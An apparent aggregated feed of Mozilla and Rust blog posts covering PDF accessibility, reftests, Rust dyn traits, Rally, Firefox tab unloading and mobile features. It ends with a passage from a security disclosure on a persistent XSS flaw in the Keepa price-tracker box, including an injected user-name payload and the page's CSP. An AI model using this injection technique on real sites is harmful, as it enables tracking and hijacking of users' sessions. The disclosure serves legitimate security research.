Early versions of PDF were not a friendly format for accessibility tools such as screen readers. This was mainly because within a document, all text on a page is more or less absolutely positioned and there’s no notion of a logical structure such as paragraphs, headings or sentences. There was also no way to provide a text description of images or figures. For example, here is some pseudocode for how a PDF may draw text:

showText("This", 0 /*x*/, 60 /*y*/);
showText("is", 0, 40);
showText("a", 0, 20);
showText("Heading!", 0, 0);

This would draw text as four separate lines, but a screen reader would have no idea that they were all part of one heading. To help with accessibility, later versions of the PDF specification introduced “Tagged PDF.” This allowed PDFs to create a logical structure that screen readers could then use. One can think of this as a similar concept to an HTML hierarchy of DOM nodes. Using the example above, one could add tags:

beginTag("heading 1");
showText("This", 0 /*x*/, 60 /*y*/);
showText("is", 0, 40);
showText("a", 0, 20);
showText("Heading!", 0, 0);
endTag("heading 1");

With the extra tag information, a screen reader knows that all of the lines are part of “heading 1” and can read it in a more natural fashion. The structure also allows screen readers to easily navigate to different parts of the document.

The above example is only about text, but tagged PDFs support many more features than this, e.g. alt text for images, table data, lists, etc.

How we supported Tagged PDFs in PDF.js

For tagged PDFs we leveraged the existing “text layer” and the browser’s built-in HTML ARIA accessibility features. We can see this with a simple PDF example that has one heading and one paragraph. First, we generate the logical structure and insert it into the canvas:

<canvas id="page1">
  <!-- This content is not visible, 
  but available to screen readers   -->
  <span role="heading" aria-level="1" aria-owns="heading_id"></span>
  <span aria-owns="some_paragraph"></span>
</canvas>

In the text layer that overlays the canvas:

<div id="text_layer">
  <span id="heading_id">Some Heading</span>
  <span id="some_paragaph">Hello world!</span>
</div>

A screen reader would then walk the DOM accessibility tree in the canvas and use the `aria-owns` attributes to find the text content for each node. For the above example, a screen reader would announce:

Heading Level 1 Some Heading
Hello World!

For those not familiar with screen readers, having this extra structure also makes navigating around the PDF much easier: you can jump from heading to heading and read paragraphs without unneeded pauses.

Ensuring there are no regressions at scale: meet reftests

Reference Test Analyzer

Crawling for PDFs

Over the past few months, we have built a web crawler to retrieve PDFs from the web and, using a set of heuristics, collect statistics about them (e.g. are they XFA? What fonts are they using? What formats of images do they include?).

We have also used the crawler with its heuristics to retrieve PDFs of interest from the “stressful PDF corpus” published by the PDF association, which proved particularly interesting as they contained many corner cases we did not think could exist.

With the crawler, we were able to build a large corpus of Tagged PDFs (around 32,000), PDFs using JS (around 1,900), and XFA PDFs (around 1,200), which we could use for manual and automated testing. Kudos to our QA team for going through so many PDFs! They now know everything about asking for a fishing license in Canada, life skills!

Reftests for the win

We did not use the corpus only for manual QA: we also added some of those PDFs to our list of reftests (reference tests).

A reftest is a test consisting of a test file and a reference file. The test file uses the pdf.js rendering engine, while the reference file doesn’t (to make sure it is consistent and can’t be affected by changes in the patch the test is validating). The reference file is simply a screenshot of the rendering of a given PDF from the “master” branch of pdf.js.

The reftest process

When a developer submits a change to the PDF.js repo, we run the reftests and ensure the rendering of the test file is exactly the same as the reference screenshot. If there are differences, we ensure that the differences are improvements rather than regressions.
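
Conceptually, the comparison is a pixel-by-pixel diff of the two screenshots, something along these lines (simplified; the real harness reports where and how the images differ):

// Simplified sketch: count differing pixels between the test rendering and
// the reference screenshot (both as ImageData of the same size).
function countDifferingPixels(testImage, referenceImage) {
  let differing = 0;
  for (let i = 0; i < testImage.data.length; i += 4) {
    for (let channel = 0; channel < 4; channel++) {      // R, G, B, A
      if (testImage.data[i + channel] !== referenceImage.data[i + channel]) {
        differing++;
        break;
      }
    }
  }
  return differing; // 0 means the rendering matches the reference exactly
}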

After accepting and merging a change, we regenerate the references.

The reftest shortcomings

In some situations a test may have subtle differences in rendering compared to the reference due to, e.g., anti-aliasing. This introduces noise in the results, with “fake” regressions the developer and reviewer have to sift through. Sometimes, it is possible to miss real regressions because of the large number of differences to look at.

Another shortcoming of reftests is that they are often big. A regression in a reftest is not as easy to investigate as a failure of a unit test.

Despite these shortcomings, reftests are a very powerful regression prevention weapon in the pdf.js arsenal. The large number of reftests we have boosts our confidence when applying changes.

Conclusion

Support for AcroForms landed in Firefox v84. JavaScript execution in v88. Tagged PDFs in v89. XFA forms in v93 (tomorrow, October 5th, 2021!).

While all of these features have greatly improved form usability and accessibility, there are still more features we’d like to add. If you’re interested in helping, we’re always looking for more contributors and you can join us on Element or GitHub.

We also want to say a big thanks to two of our contributors, Jonas Jenwald and Tim van der Meij, for their ongoing help with the above projects.

The post Implementing form filling and accessibility in the Firefox PDF viewer appeared first on Mozilla Hacks - the Web developer blog.


Data@MozillaMy first time experience at the SciPy conference

In July 2021, a few fellow Mozillians and I attended the SciPy conference with Mozilla as a diversity sponsor, meaning that our sponsorship went towards paying the stipend for the diversity speaker, Tess Tannenbaum. This was my first time attending a SciPy conference and also my first time supporting data science recruiting efforts at a conference.  The conference showcased the latest open source Python projects advancing scientific computing.  I was eager to meet the contributors of many commonly used data science Python packages and hear about new features in upcoming releases. I was excited about this opportunity as I strongly believe that conference attendance is an extremely rewarding experience for networking and learning about industry trends.  As a Data Scientist, my day-to-day work often involves using Python libraries such as scikit-learn, numpy and pandas to derive insights from data.  For a technical and data science geek like me, it felt particularly close to heart to learn about code developments and use cases from other enthusiasts in the industry.

One talk that I particularly enjoyed was on the topic of Time-to-Event Modeling in Python, led by Brian Kent and a few other data science experts.  Time-to-Event Modeling is also referred to as survival analysis, which was traditionally used in biological research studies to predict lifespans. The speakers at the talk were the contributors of some of the most popular survival analysis Python packages.  For example, Lifelines is an introductory Python package that is a good starting point for survival analysis.  Scikit-Survival is another package, built on top of scikit-learn, the commonly used machine learning library.  The focus of the talk was on how survival analysis could be useful in many different scenarios, such as in customer analytics.  There is also increasing usage of survival analysis in SaaS businesses, where it can be used to predict customer churn and help companies plan their retention strategies.  I am curious how Mozilla could apply survival analysis in ways that also respect data governance guidelines.

Like many other large group events that happened in the past year, the conference was entirely virtual and utilized various platforms to host talks and engagement activities.  In addition to having Slack as a communication tool, the conference also used Airmeet and Gather Town this year.  The various sessions, tutorials and recruiting booths were hosted in Airmeet.  The more interactive talks took place in Gather Town, which I found quite entertaining and enjoyable.  It is a game-like environment where everyone has a character that can walk around in the virtual space, and you can network or meet with others by walking up to their characters; their video cameras show up as you approach.  Conference organizers did a great job quickly adapting to hosting virtual gatherings and coordinating multiple tools to deliver a seamless experience.

When the SciPy conference happens again in 2022, I will dedicate more time to networking and attending tutorials, ideally in person.  I am also hopeful that it will be an opportunity to meet some remote colleagues from Mozilla in person.  Overall, the conference experience was definitely rewarding, as it is important to stay current with new developments and collaborate with other technical enthusiasts in the rapidly changing scientific computing industry.

 

Resources:

Mozillians sharing the 2021 SciPy Conference experience:

SciPy 2021 conference proceedings

SciPy 2021 YouTube Channel

Niko MatsakisDyn async traits, part 3

In the previous “dyn async traits” posts, I talked about how we can think about the compiler as synthesizing an impl that performed the dynamic dispatch. In this post, I wanted to start exploring a theoretical future in which this impl was written manually by the Rust programmer. This is in part a thought exercise, but it’s also a possible ingredient for a future design: if we could give programmers more control over the “impl Trait for dyn Trait” impl, then we could enable a lot of use cases.

Example

For this post, async fn is kind of a distraction. Let’s just work with a simplified Iterator trait:

trait Iterator {
    type Item;
    fn next(&mut self) -> Option<Self::Item>;
}

As we discussed in the previous post, the compiler today generates an impl that is something like this:

impl<I> Iterator for dyn Iterator<Item = I> {
    type Item = I;
    fn next(&mut self) -> Option<I> {
        type RuntimeType = ();
        let data_pointer: *mut RuntimeType = self as *mut ();
        let vtable: DynMetadata = ptr::metadata(self);
        let fn_pointer: fn(*mut RuntimeType) -> Option<I> =
            __get_next_fn_pointer__(vtable);
        fn_pointer(data_pointer)
    }
}

This code draws on the APIs from RFC 2580, along with a healthy dash of “pseudo-code”. Let’s see what it does:

Extracting the data pointer

type RuntimeType = ();
let data_pointer: *mut RuntimeType = self as *mut ();

Here, self is a wide pointer of type &mut dyn Iterator<Item = I>. The rules for as state that casting a wide pointer to a thin pointer drops the metadata [1], so we can (ab)use that to get the data pointer. Here I just gave the pointer the type *mut RuntimeType, which is an alias for *mut () — i.e., raw pointer to something. The type alias RuntimeType is meant to signify “whatever type of data we have at runtime”. Using () for this is a hack; the “proper” way to model it would be with an existential type. But since Rust doesn’t have those, and I’m not keen to add them if we don’t have to, we’ll just use this type alias for now.

Extracting the vtable (or DynMetadata)

let vtable: DynMetadata = ptr::metadata(self);

The ptr::metadata function was added in RFC 2580. Its purpose is to extract the “metadata” from a wide pointer. The type of this metadata depends on the type of wide pointer you have: this is determined by the Pointee trait. For dyn types, the metadata is a DynMetadata, which just means “pointer to the vtable”. In today’s APIs, the DynMetadata is pretty limited: it lets you extract the size/alignment of the underlying RuntimeType, but it doesn’t give any access to the actual function pointers that are inside.

Extracting the function pointer from the vtable

let fn_pointer: fn(*mut RuntimeType) -> Option<I> = 
    __get_next_fn_pointer__(vtable);

Now we get to the pseudocode. Somehow, we need a way to get the fn pointer out from the vtable. At runtime, the way this works is that each method has an assigned offset within the vtable, and you basically do an array lookup; kind of like vtable.methods()[0], where methods() returns an array &[fn()] of function pointers. The problem is that there’s a lot of “dynamic typing” going on here: the signature of each one of those methods is going to be different. Moreover, we’d like some freedom to change how vtables are laid out. For example, the ongoing (and awesome!) work on dyn upcasting by Charles Lew has required modifying our vtable layout, and I expect further modification as we try to support dyn types with multiple traits, like dyn Debug + Display.

So, for now, let’s just leave this as pseudocode. Once we’ve finished walking through the example, I’ll return to this question of how we might model __get_next_fn_pointer__ in a forwards compatible way.

One thing worth pointing out: the type of fn_pointer is a fn(*mut RuntimeType) -> Option<I>. There are two interesting things going on here:

  • The argument has type *mut RuntimeType: using the type alias indicates that this function is known to take a single pointer (in fact, it’s a reference, but those have the same layout). This pointer is expected to point to the same runtime data that self points at — we don’t know what it is, but we know that they’re the same. This works because self paired together a pointer to some data of type RuntimeType along with a vtable of functions that expect RuntimeType references. [2]
  • The return type is Option<I>, where I is the item type: this is interesting because although we don’t know statically what the Self type is, we do know the Item type. In fact, we will generate a distinct copy of this impl for every kind of item. This allows us to easily pass the return value.

Calling the function

fn_pointer(data_pointer)

The final line in the code is very simple: we call the function! It returns an Option<I> and we can return that to our caller.

Returning to the pseudocode

We relied on one piece of pseudocode in that imaginary impl:

let fn_pointer: fn(*mut RuntimeType) -> Option<I> = 
    __get_next_fn_pointer__(vtable);

So how could we possibly turn __get_next_fn_pointer__ from pseudocode into real code? There are two things worth noting:

  • First, the name of this function already encodes the method we want (next). We probably don’t want to generate an infinite family of these “getter” functions.
  • Second, the signature of the function is specific to the method we want, since it returns a fn type (fn(*mut RuntimeType) -> Option<I>) that encodes the signature for next (with the self type changed, of course). This seems better than just returning a generic signature like fn() that must be cast manually by the user; less opportunity for error.

Using zero-sized fn types as the basis for an API

One way to solve these problems would be to build on the trait system. Imagine there were a type for every method, let’s call it A, and that this type implemented a trait like AssociatedFn:

trait AssociatedFn {
    // The type of the associated function, but as a `fn` pointer
    // with the self type erased. This is the type that would be
    // encoded in the vtable.
    type FnPointer;

     // maybe other things
}

We could then define a generic “get function pointer” function like so:

fn associated_fn<A>(vtable: DynMetadata) -> A::FnPointer
where
    A: AssociatedFn

Now instead of __get_next_fn_pointer__, we can write

type NextMethodType =  /* type corresponding to the next method */;
let fn_pointer: fn(*mut RuntimeType) -> Option<I> = 
   associated_fn::<NextMethodType>(vtable);

Ah, but what is this NextMethodType? How do we get the type for the next method? Presumably we’d have to introduce some syntax, like Iterator::next.

This idea of a type for associated functions is very close (but not identical) to an already existing concept in Rust: zero-sized function types. As you may know, the type of a Rust function is in fact a special zero-sized type that uniquely identifies the function. There is (presently, anyway) no syntax for this type, but you can observe it by printing out the size of values (playground):

fn foo() { }

// The type of `f` is not `fn()`. It is a special, zero-sized type that uniquely
// identifies `foo`
let f = foo;
println!("{}", std::mem::size_of_val(&f)); // prints 0

// This type can be coerced to `fn()`, which is a function pointer
let g: fn() = f;
println!("{}", std::mem::size_of_val(&g)); // prints 8

There are also types for functions that appear in impls. For example, you could get an instance of the type that represents the next method on vec::IntoIter<u32> like so:

let x = <vec::IntoIter<u32> as Iterator>::next;
println!("{}", std::mem::size_of_val(&x)); // prints 0

Where the zero-sized types don’t fit

The existing zero-sized types can’t be used for our “associated function” type for two reasons:

  • You can’t name them! We can fix this by adding syntax.
  • There is no zero-sized type for a trait function independent of an impl.

The latter point is subtle [3]. Before, when I talked about getting the type for a function from an impl, you’ll note that I gave a fully qualified function name, which specified the Self type precisely:

let x = <vec::IntoIter<u32> as Iterator>::next;
//       ^^^^^^^^^^^^^^^^^^ the Self type

But what we want in our impl is to write code that doesn’t know what the Self type is! So this type that exists in the Rust type system today isn’t quite what we need. But it’s very close.

Conclusion

I’m going to leave it here. Obviously, I haven’t presented any kind of final design, but we’ve seen a lot of tantalizing ingredients:

  • Today, the compiler generates an impl Iterator for dyn Iterator that extracts functions from a vtable and invokes them by magic.
  • But, using the APIs from RFC 2580, you can almost write that impl by hand. What is missing is a way to extract a function pointer from a vtable, and what makes that hard is that we need a way to identify the function we are extracting.
  • We have zero-sized types that represent functions today, but we don’t have a way to name them, and we don’t have zero-sized types for functions in traits, only in impls.

Of course, all of the stuff I wrote here was just about normal functions. We still need to circle back to async functions, which add a few extra wrinkles. Until next time!

Footnotes

  1. I don’t actually like these rules, which have bitten me a few times. I think we should introduce an accessor function, but I didn’t see one in RFC 2580 — maybe I missed it, or it already exists. 

  2. If you used unsafe code to pair up a random pointer with an unrelated vtable, then hilarity would ensue here, as there is no runtime checking that these types line up. 

  3. And, in fact, I didn’t see it until I was writing this blog post! 

Hacks.Mozilla.OrgControl your data for good with Rally

Let’s face it: if you have ever used the internet, signed up for an online account, or even read a blog post like this one, chances are that your data has left a permanent mark on the interwebs, and online services have exploited it without your awareness for a very long time.

The Fight for Privacy

The fight for privacy is compounded by the rise in misinformation and platforms like Facebook willingly sharing information that is untrustworthy, shutting down platforms like Crowdtangle and recently terminating the accounts of New York University researchers that built Ad Observer, an extension dedicated to bringing greater transparency to political advertising. We think a better internet is one where people have more control over their data. 

Contribute your data for good

In a world where data and AI are reshaping society, people currently have no tangible way to put their data to work for the causes they believe in. To address this, we built the Rally platform, a first-of-its-kind tool that enables you to contribute your data to specific studies and exercise consent at a granular level. Mozilla Rally puts you in control of your data while building a better Internet and a better society. 

Mozilla Rally

Like Mozilla, Rally is a community-driven open source project and we publish our code on GitHub, ensuring that it’s open-source and freely available for you to audit. Privacy, control and transparency are foundational to Rally. Participating is voluntary, meaning we won’t collect data unless you agree to it first, and we’ll provide you with a clear understanding of what we have access to at every step of the way.

 

With your help, we can create a safer, more transparent, and more equitable internet that protects people, not Big Tech. 

Interested?

Rally needs users and is currently available on Firefox. In the future, we will expand to other web browsers. We’re currently looking for users who are residents in the United States, age 19 and older. 

Protecting the internet and its users is hard work!  We’re also hiring to grow our Rally Team.

 

The post Control your data for good with Rally appeared first on Mozilla Hacks - the Web developer blog.

Support.Mozilla.OrgIntroducing Abby Parise

Hi folks,

It’s with great pleasure that I introduce Abby Parise, who is the latest addition to the Customer Experience team. Abby is taking the role of Support Content Manager, so you’ll definitely see more of her in SUMO. If you were with us or have watched September’s community call, you might’ve seen her there.

Here’s a brief introduction from Abby:

Hi there! My name is Abby and I’m the new Support Content Manager for Mozilla. I’m a longtime Firefox user with a passion for writing compelling content to help users achieve their goals. I’m looking forward to getting to know our contributors and would love to hear from you on ideas to make our content more helpful and user-friendly!

Please join me to welcome Abby!

This Week In RustThis Week in Rust 411

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Project/Tooling Updates
Research and Papers
Newsletters
Observations/Thoughts
Rust Walkthroughs

Crate of the Week

This week's crate is pubgrub, a Rust implementation of the state of the art version solving algorithm.

Thanks to Louis Pilfold for the suggestion!

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

ockam

jsonschema-rs

Updates from the Rust Project

266 pull requests were merged in the last week

Rust Compiler Performance Triage

A fairly busy week, with a relatively high percentage of PRs landing with regressions and improvements. The overall trajectory is fairly neutral for this week though.

Triage done by @simulacrum. Revision range: 83f147b..25ec82

5 Regressions, 5 Improvements, 5 Mixed; 1 of them in rollups

43 comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in the final comment period.

Tracking Issues & PRs
New RFCs

Upcoming Events

Online
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Grafbase

Jigzi

pganalyze

Oso

Kraken

Subspace Labs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

There's a common trope among people unfamiliar with rust where they assume that if you use unsafe at all, then it's just as unsafe as C and rust provided no benefit. Comparing C's approach to safety vs Rust's is like comparing an open world assumption to a closed world assumption in formal logic systems. In C, you publish your api if it's possible to use correctly (open world). In Rust, you publish a safe api if it's impossible to use incorrectly (closed world). Rust's key innovation here is that it enables you to build a 'bridge' from open world (unsafe) to a closed world (safe), a seemingly impossible feat that feels like somehow pairwise reducing an uncountable infinity with a countable infinity. Rust's decision to design an analogous closed-world assumption for safe code is extremely powerful, but it seems very hard for old school C programmers to wrap their head around it.

/u/infogulch on /r/rust

Thanks to Alice Ryhl for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Hacks.Mozilla.OrgTab Unloading in Firefox 93

Starting with Firefox 93, Firefox will monitor available system memory and, should it ever become so critically low that a crash is imminent, Firefox will respond by unloading memory-heavy but not actively used tabs. This feature is currently enabled on Windows and will be deployed later for macOS and Linux as well. When a tab is unloaded, the tab remains in the tab bar and will be automatically reloaded when it is next selected. The tab’s scroll position and form data are restored just like when the browser is restarted with the restore previous windows browser option.

On Windows, out-of-memory (OOM) situations are responsible for a significant number of the browser and content process crashes reported by our users. Unloading tabs allows Firefox to save memory leading to fewer crashes and avoids the associated interruption in using the browser.

We believe this may especially benefit people who are doing heavy browsing work with many tabs on resource-constrained machines. Or perhaps those users simply trying to play a memory-intensive game or using a website that goes a little crazy. And of course, there are the tab hoarders, (no judgement here). Firefox is now better at surviving these situations.

We have experimented with tab unloading on Windows in the past, but a problem we could not get past was that finding a balance between decreasing the browser’s memory usage and annoying the user because there’s a slight delay as the tab gets reloaded, is a rather difficult exercise, and we never got satisfactory results.

We have now approached the problem again by refining our low-memory detection and tab selection algorithm and narrowing the action to the case where we are sure we’re providing a user benefit: if the browser is about to crash. Recently we have been conducting an experiment on our Nightly channel to monitor how tab unloading affects browser use and the number of crashes our users encounter. We’ve seen encouraging results with that experiment. We’ll continue to monitor the results as the feature ships in Firefox 93.

With our experiment on the Nightly channel, we hoped to see a decrease in the number of OOM crashes hit by our users. However, after the month-long experiment, we found an overall significant decrease in browser crashes and content process crashes. Of those remaining crashes, we saw an increase in OOM crashes. Most encouragingly, people who had tab unloading enabled were able to use the browser for longer periods of time. We also found that average memory usage of the browser increased.

The latter may seem very counter-intuitive, but is easily explained by survivorship bias. Much like in the archetypal example of the Allied WWII bombers with bullet holes, browser sessions that had such high memory usage would have crashed and burned in the past, but are now able to survive by unloading tabs just before hitting the critical threshold.

The increase in OOM crashes, also very counter-intuitive, is harder to explain. Before tab unloading was introduced, Firefox already responded to Windows memory-pressure by triggering an internal memory-pressure event, allowing subsystems to reduce their memory use. With tab unloading, this event is fired after all possible unloadable tabs have been unloaded.

This may account for the difference. Another hypothesis is that it’s possible our tab unloading sometimes kicks in a fraction too late and finds the tabs in a state where they can’t even be safely unloaded any more.

For example, unloading a tab requires a garbage collection pass over its JavaScript heap. This needs some additional temporary storage that is not available, leading to the tab crashing instead of being unloaded but still saving the entire browser from going down.

We’re working on improving our understanding of this problem and the relevant heuristics. But given the clearly improved outcomes for users, we felt there was no point in holding back the feature.

When does Firefox automatically unload tabs?

When system memory is critically low, Firefox will begin automatically unloading tabs. Unloading tabs could disturb users’ browsing sessions, so the approach aims to unload tabs only when necessary to avoid crashes. On Windows, Firefox gets a notification from the operating system (set up using CreateMemoryResourceNotification) indicating that the available physical memory is running low. The threshold for low physical memory is not documented, but appears to be around 6%. Once that occurs, Firefox starts periodically checking the commit space (MEMORYSTATUSEX.ullAvailPageFile).

When the commit space reaches a low-memory threshold, which is defined with the preference “browser.low_commit_space_threshold_mb”, Firefox will unload one tab, or if there are no unloadable tabs, trigger the Firefox-internal memory-pressure warning allowing subsystems in the browser to reduce their memory use. The browser then waits for a short period of time before checking commit space again and then repeating this process until available commit space is above the threshold.
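
In rough pseudocode (a simplified sketch with stand-in helpers, not the actual Firefox implementation), the loop looks like this:

// Simplified sketch of the unloading loop; helpers stand in for Firefox internals.
const LOW_COMMIT_THRESHOLD_MB = 200; // stand-in for browser.low_commit_space_threshold_mb
let availableCommitMB = 150;         // pretend commit space is currently low

const pickLeastRecentlyUsedUnloadableTab = () => ({ id: 42 });
const unloadTab = (tab) => { availableCommitMB += 60; };          // unloading frees commit space
const notifyInternalMemoryPressure = () => { availableCommitMB += 20; };
const wait = (ms) => new Promise((resolve) => setTimeout(resolve, ms));

async function handleLowCommitSpace() {
  while (availableCommitMB < LOW_COMMIT_THRESHOLD_MB) {
    const tab = pickLeastRecentlyUsedUnloadableTab();
    if (tab) {
      unloadTab(tab);                 // unload one tab at a time
    } else {
      notifyInternalMemoryPressure(); // no unloadable tabs: ask subsystems to shrink
    }
    await wait(1000);                 // short pause before re-checking commit space
  }
}

handleLowCommitSpace();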

We found the checks on commit space to be essential for predicting when a real out-of-memory situation is happening. As long as there is still swap AND physical memory available, there is no problem. If we run out of physical memory and there is swap, performance will crater due to paging, but we won’t crash.

On Windows, allocations fail and applications will crash if there is low commit space in the system, even though there is physical memory available, because Windows does not overcommit memory and can refuse to allocate virtual memory to the process in this case. In other words, unlike Linux, Windows always requires commit space to allocate memory.

How do we end up in this situation? If some applications allocate memory but do not touch it, Windows does not assign the physical memory to such untouched memory. We have observed graphics drivers doing this, leading to low swap space when plenty of physical memory is available.

In addition, crash data we collected indicated that a surprising number of users with beefy machines were in this situation, some perhaps thinking that because they had a lot of memory in their machine, the Windows swap could be reduced to the bare minimum. You can see why this is not a good idea!

How does Firefox choose which tabs to unload first?

Ideally, only tabs that are no longer needed will be unloaded and the user will eventually restart the browser or close unloaded tabs before ever reloading them. A natural metric is to consider when the user has last used a tab. Firefox unloads tabs in least-recently-used order.

Tabs playing sound, using picture-in-picture, pinned tabs, or tabs using WebRTC (which is used for video and audio conferencing sites) are weighted more heavily so they are less likely to be unloaded. Tabs in the foreground are never unloaded. We plan to do more experiments and continue to tune the algorithm, aiming to reduce crashes while maintaining performance and being unobtrusive to the user.

about:unloads

For diagnostic and testing purposes, a new page about:unloads has been added to display the tabs in their unload-priority-order and to manually trigger tab unloading. This feature is currently in beta and will ship with Firefox 94.

Screenshot of the about:unloads page in beta planned for Firefox 94.

Browser Extensions

Some browser extensions already offer users the ability to unload tabs. We expect these extensions to interoperate with automatic tab unloading as they use the same underlying tabs.discard() API. Although it may change in the future, today automatic tab unloading only occurs when system memory is critically low, which is a low-level system metric that is not exposed by the WebExtensions API. (Note: an extension could use the native messaging support in the WebExtensions API to accomplish this with a separate application.) Users will still be able to benefit from tab unloading extensions and those extensions may offer more control over when tabs are unloaded, or deploy more aggressive heuristics to save more memory.
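
For extension authors, a minimal sketch of using that API to discard all inactive, not-yet-discarded tabs (oldest first) could look like this; the exact permissions you need depend on which tab properties you read:

// Minimal WebExtension sketch built on the same tabs.discard() API.
async function discardBackgroundTabs() {
  // Find tabs that are not currently active and not already discarded.
  const tabs = await browser.tabs.query({ active: false, discarded: false });
  // Discard the least recently accessed tabs first.
  tabs.sort((a, b) => a.lastAccessed - b.lastAccessed);
  await browser.tabs.discard(tabs.map((tab) => tab.id));
}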

Let us know how it works for you by leaving feedback on ideas.mozilla.org or reporting a bug. For support, visit support.mozilla.org. Firefox crash reporting and telemetry adhere to our data privacy principles. See the Mozilla Privacy Policy for more information.

Thanks to Gian-Carlo Pascutto, Toshihito Kikuchi, Gabriele Svelto, Neil Deakin, Kris Wright, and Chris Peterson, for their contributions to this blog post and their work on developing tab unloading in Firefox.

The post Tab Unloading in Firefox 93 appeared first on Mozilla Hacks - the Web developer blog.

The Mozilla BlogNews from Firefox Focus and Firefox on Mobile

One of our promises this year was to deliver ways that can help you navigate the web easily and get you quickly where you need to go. We took a giant step in that direction earlier this year when we shared a new Firefox experience. We were on a mission to save you time and streamline your everyday use of the browser. This month, we continue to deliver on that mission with new features in our Firefox on mobile products. For our Firefox Focus mobile users, we have a fresh redesign plus new features including shortcuts to get you faster to the things you want to get to. This Cybersecurity Awareness month, you can manage your passwords and take them wherever you go whenever you use your Firefox on Android mobile app. 

Fresh, new Firefox Focus 

Since its launch, Firefox Focus has been a favorite app thanks to its minimal design and streamlined features, perfect for those times when you want to do a super quick search without the distractions. So, when it came to refreshing Firefox Focus, we wanted to offer a simple, privacy-by-default companion app that lets users quickly complete searches without distraction or worry of being tracked or bombarded with advertisements. We added a fresh new look with new colors, a new logo and a dark theme. We added a shortcut feature so that users can get to the sites they visit the most. And with privacy in mind, the Tracking Protection Shield icon is accessible from the search bar, so you can quickly turn individual trackers on or off when you click the shield icon. Plus, we added a global counter that shows you all the trackers blocked for you. Check out the new Firefox Focus and try it for life’s “get in and get out” moments. 

New shortcut feature to get you to the sites you visit most

Got a ton of passwords? Keep them safe on Firefox on Android

What do Superman, Black Widow and Wolverine have in common? They make horrible passwords. At least that’s what we discovered when we took a look to see how fortified superhero passwords are in the fight against hackers and breaches. You can see how your favorite superheroes fared in “Superhero passwords may be your kryptonite wherever you go online.”  

This Cybersecurity Awareness month, we added new features on Firefox on Android, to keep your passwords safe. We’ve increasingly become dependent on the web, whether it’s signing up for streaming services or finding new ways to connect with families and friends, we’ve all had to open an account and assign a completely new password. Whether it’s 10 or 100 passwords, you can take your passwords wherever you go on Firefox on Android. These new features will be available on iOS later this year. The new features include:

  • Creating and adding new passwords is easy – Now, when you create an account for any app on your mobile device, you can also create and add a new password, which you can save directly in the Firefox browser and use on both mobile and desktop.

Create and add new passwords

  • Take your passwords with you on the go – Now you can easily autofill your password on your phone and use any password you’ve saved in the browser to log into any online account like your Twitter or Instagram app. No need to open a web page. Plus, if you have a Firefox account then you can sync all your passwords across desktop and mobile devices. It’s that seamless and simple. 
Sync all your passwords across desktop and mobile devices

  • Unlock your passwords with your fingerprint or face – Now only you can safely open your accounts when you use your operating system’s biometric security, such as your face or your fingerprint touch to unlock the access page to your logins and passwords.

Firefox coming soon to a Windows store near you

Microsoft has loosened restrictions on its Windows Store that effectively banned third-party browsers from the store. We have been advocating for years for more user choice and control on the Windows operating system. We welcome the news that their store is now more open to companies and applications, including independent browsers like Firefox. We believe that a healthier internet is one where people have an opportunity to choose from a diverse range of browsers and browser engines. Firefox will be available in the Windows store later this year. 

Get the fast, private browser for your desktop and mobile: Firefox on Android, Firefox for iOS and Firefox Focus today.

For more on Firefox:

11 secret tips for Firefox that will make you an internet pro

7 things to know (and love) about the new Firefox for Android

Modern, clean new Firefox clears the way to all you need online

Behind the design: A fresh new Firefox

The post News from Firefox Focus and Firefox on Mobile appeared first on The Mozilla Blog.

Wladimir PalantAbusing Keepa Price Tracker to track users on Amazon pages

As we’ve seen before, shopping assistants usually aren’t a good choice of browser add-on if you value either your privacy or security. This impression is further reinforced by Keepa, the Amazon Price Tracker. The good news here: the scope of this extension is limited to Amazon properties. But that’s all the good news there are. I’ve already written about excessive data collection practices in this extension. I also reported two security vulnerabilities to the vendor.

Today we’ll look at a persistent Cross-Site Scripting (XSS) vulnerability in the Keepa Box. This one allowed any attacker to track you across Amazon web properties. The second vulnerability exposed Keepa’s scraping functionality to third parties and could result in data leaks.

A meat grinder with the Keepa logo on its side working on the Amazon logo, producing lots of prices and stars. Image credits: Keepa, palomaironique, Nikon1803

Persistent XSS vulnerability

What is the Keepa Box?

When you open an Amazon product page, the Keepa extension will automatically inject a frame like https://keepa.com/iframe_addon.html#3-0-B07FCMBLV6 into it. Initially, it shows you a price history for the article, but there is far more functionality here.

Complicated graph showing the price history of an Amazon article, with several knops to tweak the presentation as well as several other options such as logging in.

This page, called the Keepa Box, is mostly independent of the extension. Whether the extension is present or not, it lets you look at the data, log into an account and set alerts. The extension merely assists it by handling some messages, more on that below.

Injecting HTML code

The JavaScript code powering the Keepa Box is based on jQuery, security-wise a very questionable choice of framework. As common with jQuery-based projects, this one will compose HTML code from strings. And it doesn’t bother properly escaping special characters, so there are plenty of potential HTML injection points. For example this one:

html = storage.username ?
          "<span id=\"keepaBoxSettings\">" + storage.username + "</span>" :
          "<span id=\"keepaBoxLogin\">" + la._9 + "</span>";

If the user is logged in, the user name as set in storage.username will be displayed. So a malicious user name like me<img src=x onerror=alert(1)> will inject additional JavaScript code into the page (here displaying a message). While it doesn’t seem possible to change the user name retroactively, it was possible to register an account with a user name like this one.

Now this page is using the Content Security Policy mechanism which could have prevented the attack. But let’s have a look at the script-src directive:

script-src 'self' 'unsafe-inline' https://*.keepa.com https://apis.google.com
    https://*.stripe.com https://*.googleapis.com https://www.google.com/recaptcha/
    https://www.gstatic.com/recaptcha/ https://completion.amazon.com
    https://completion.amazon.co.uk https://completion.amazon.de
    https://completion.amazon.fr https://completion.amazon.co.jp
